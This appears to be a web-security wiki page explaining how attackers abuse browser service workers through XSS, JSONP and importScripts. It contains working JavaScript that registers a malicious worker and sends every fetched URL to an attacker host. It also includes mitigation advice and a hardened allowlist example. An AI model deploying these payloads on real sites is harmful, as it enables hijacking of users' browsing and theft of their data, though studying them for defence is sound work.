Abusing Service Workers


Basic Information

A service worker is a script that your browser runs in the background, separate from any web page, enabling features that do not require a web page or user interaction, which improves offline and background processing. Detailed information on service workers can be found here. By abusing service workers inside a vulnerable web origin, attackers can gain control over the victim's interactions with every page within that origin.

Checking for Existing Service Workers

Existing service workers can be inspected in the Service Workers section of the Application tab of the Developer Tools. Another option is to visit chrome://serviceworker-internals for a more detailed view.

Push Notifications

Push notification permissions directly affect a service worker's ability to communicate with a server without direct user interaction. If the permission is denied, the service worker's potential to pose a persistent threat is limited. Conversely, granting the permission increases the security risk by allowing potential exploits to be received and executed.

Attack Creating a Service Worker

To exploit this vulnerability you need to find:

  • A way to upload arbitrary JS files to the server and an XSS to register the uploaded JS file as a service worker

  • A vulnerable JSONP request where you can control the output (with arbitrary JS code) and an XSS to load the JSONP with a payload that registers a malicious service worker.

In the following example I will present the code to register a new service worker that will listen to the fetch event and will send every fetched URL to the attacker's server (this is the code you would need to upload to the server or load via a vulnerable JSONP response):

self.addEventListener('fetch', function(e) {
    e.respondWith(caches.match(e.request).then(function(response) {
        fetch('https://attacker.com/fetch_url/' + e.request.url)
    }));
});

And this is the code that will register the worker (the code you should be able to execute through the XSS). In this case a GET request will be sent to the attacker's server to signal whether the service worker registration succeeded or not:

<script>
window.addEventListener('load', function() {
    var sw = "/uploaded/ws_js.js";
    navigator.serviceWorker.register(sw, {scope: '/'})
        .then(function(registration) {
            var xhttp2 = new XMLHttpRequest();
            xhttp2.open("GET", "https://attacker.com/SW/success", true);
            xhttp2.send();
        }, function (err) {
            var xhttp2 = new XMLHttpRequest();
            xhttp2.open("GET", "https://attacker.com/SW/error", true);
            xhttp2.send();
        });
});
</script>

In the case of abusing a vulnerable JSONP endpoint you should put the value inside var sw. For example:

var sw = "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//";

There is a C2 dedicated to the exploitation of Service Workers called Shadow Workers that will be very useful to abuse these vulnerabilities.

The 24-hour cache directive limits the life of a malicious or compromised service worker (SW) to at most 24 hours after an XSS vulnerability fix, assuming online client status. To minimize vulnerability, site operators can lower the SW script's Time-To-Live (TTL). Developers are also advised to create a service worker kill-switch for rapid deactivation.

Abusing importScripts in a SW via DOM Clobbering

The function importScripts called from a Service Worker can import a script from a different domain. If this function is called with a parameter that an attacker can modify, he would be able to import a JS script from his own domain and get XSS.

This even bypasses CSP protections.

Example vulnerable code:

  • index.html

<script>
navigator.serviceWorker.register('/dom-invader/testcases/augmented-dom-import-scripts/sw.js' + location.search);
// attacker controls location.search
</script>

  • sw.js

const searchParams = new URLSearchParams(location.search);
let host = searchParams.get('host');
self.importScripts(host + "/sw_extra.js");
//host can be controllable by an attacker
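A hardened counterpart of the sw.js above, added here as an example (not code from the page or from DOM Invader's test cases): the host taken from location.search is checked against a fixed origin allowlist before importScripts is called, and the import URL is rebuilt from the validated origin rather than concatenated from raw input; the same check applies when the value comes from a DOM element (the DOM Clobbering case below). The allowlist entry static.example.com and the helper name resolveExtraScriptUrl are assumptions.

```javascript
// Hardened sw.js (added example). Only origins in this list may supply
// the extra script; the value is a constructed placeholder.
const ALLOWED_ORIGINS = ['https://static.example.com'];

// Returns the URL to import, or null when the requested host is not allowed.
function resolveExtraScriptUrl(search, allowed = ALLOWED_ORIGINS) {
  const params = new URLSearchParams(search);
  const host = params.get('host');
  if (host === null) return null;

  let origin;
  try {
    // new URL() without a base rejects relative and protocol-relative
    // values such as "//attacker.example", and exposes the real origin
    // even when userinfo tricks like "https://good@evil" are used.
    origin = new URL(host).origin;
  } catch (_) {
    return null;
  }
  if (!allowed.includes(origin)) return null;

  // Rebuild from the validated origin so any path or query smuggled in
  // the user-supplied string is discarded.
  return new URL('/sw_extra.js', origin).href;
}

// Inside a real ServiceWorkerGlobalScope, import only after validation.
if (typeof self !== 'undefined' && typeof self.importScripts === 'function') {
  const target = resolveExtraScriptUrl(self.location.search);
  if (target !== null) {
    self.importScripts(target);
  }
}
```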

With DOM Clobbering

For more information about what DOM Clobbering is, check:

Dom Clobbering

If the URL/domain that the SW uses to call importScripts is taken from an HTML element, it is possible to modify it via DOM Clobbering to make the SW load a script from your own domain.

For an example of this, check the reference link.

References
